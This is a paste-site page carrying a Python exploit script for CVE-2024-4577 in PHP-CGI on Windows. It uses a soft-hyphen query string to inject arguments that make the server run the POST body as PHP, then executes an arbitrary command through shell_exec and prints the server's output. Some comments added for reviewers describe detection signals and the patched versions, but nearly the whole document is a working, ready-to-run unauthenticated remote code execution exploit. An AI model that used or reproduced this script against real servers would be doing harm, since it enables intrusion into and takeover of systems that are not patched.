FlyFar

PHP < 8.3.8 - Remote Code Execution (Unauthenticated) - CVE-2024-4577

Jun 24th, 2024
  1. # Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
  2. # Exploit Author: Yesith Alvarez
  3. # Vendor Homepage: https://www.php.net/downloads.php
  4. # Version: PHP 8.3.* < 8.3.8, 8.2.* < 8.2.20, 8.1.* < 8.1.29
  5. # CVE : CVE-2024-4577
  6.  
  7. from requests import Request, Session
  8. import sys
  9. import json
  10.  
  11.  
  12.  
def title():
    """Print the author's ASCII-art CVE banner and credit links to stdout."""
    # Held in a local so the literal and the output call are separate; the
    # text itself is unchanged.
    banner = '''
   
  _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______
 / ____\ \   / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  |
| |     \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / /
| |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \  / /    / /  
| |____   \ /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /  
 \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                              
                                                                                                                     
                                                                             
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
   '''
    print(banner)
  29.  
  30.  
def exploit(url, command):
    """POST each body in ``payloads`` to ``url`` with the CVE-2024-4577 query string and print the replies.

    Args:
        url: Base URL of the server under test; a fixed query string is
            appended to it inside the loop.
        command: String concatenated, unescaped, into a PHP ``shell_exec``
            call in one of the request bodies.

    Returns:
        None. The status code and body of every response are printed.

    Reviewer notes for defenders:
        * The query string carries ``%AD`` (byte 0xAD, soft hyphen) where a
          ``-`` would be. Per the public advisory for CVE-2024-4577, Windows
          Best-Fit character conversion can turn that byte into ``-`` before
          php-cgi parses its arguments, so the request is read as
          ``-d allow_url_include=1 -d auto_prepend_file=php://input`` and the
          POST body is executed as PHP.
        * Log/WAF signals visible in this code: ``%AD`` in a query string
          together with ``allow_url_include`` or ``auto_prepend_file``, a POST
          body beginning ``<?php``, and a POST that arrives without a
          Content-Type header.
        * Remediation is the upgrade named in the file header: PHP 8.3.8,
          8.2.20 or 8.1.29 and later.
    """
    # NOTE: this is a set literal, so the order in which the two bodies are
    # sent is not fixed by the code. The first body is a harmless marker
    # ("vulnerable"); the second wraps the caller's command in shell_exec.
    payloads = {
        '<?php echo "vulnerable"; ?>',
        '<?php echo shell_exec("'+command+'"); ?>'
    }
    # Browser-like User-Agent; the Content-Type entry is removed again below.
    headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
    'Content-Type': 'application/x-www-form-urlencoded'}
    s = Session()
    for payload in payloads:
        # url is reassigned on every pass, so the suffix is appended again each
        # time; detection rules should match the substring, not an exact query.
        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        req = Request('POST', url, data=payload, headers=headers)
        prepped = req.prepare()
        # The prepared request is sent without a Content-Type header.
        del prepped.headers['Content-Type']
        # verify=False turns off TLS certificate validation for this request;
        # timeout=15 bounds the wait in seconds.
        resp = s.send(prepped,
        verify=False,
        timeout=15)
        #print(prepped.headers)
        #print(url)
        #print(resp.headers)
        #print(payload)
        # Raw status and body are printed; nothing is parsed or checked here.
        print(resp.status_code)
        print(resp.text)
  54.  
  55.  
if __name__ == '__main__':
    # The banner is printed on every run, before argument handling.
    title()
    script = sys.argv[0]
    if len(sys.argv) >= 2:
        # NOTE(review): this branch is taken with a single argument, yet
        # sys.argv[2] is read below.
        exploit(sys.argv[1], sys.argv[2])
    else:
        # No arguments: show both usage lines and leave with status 0.
        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(script))
        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(script))
        exit(0)
  64.            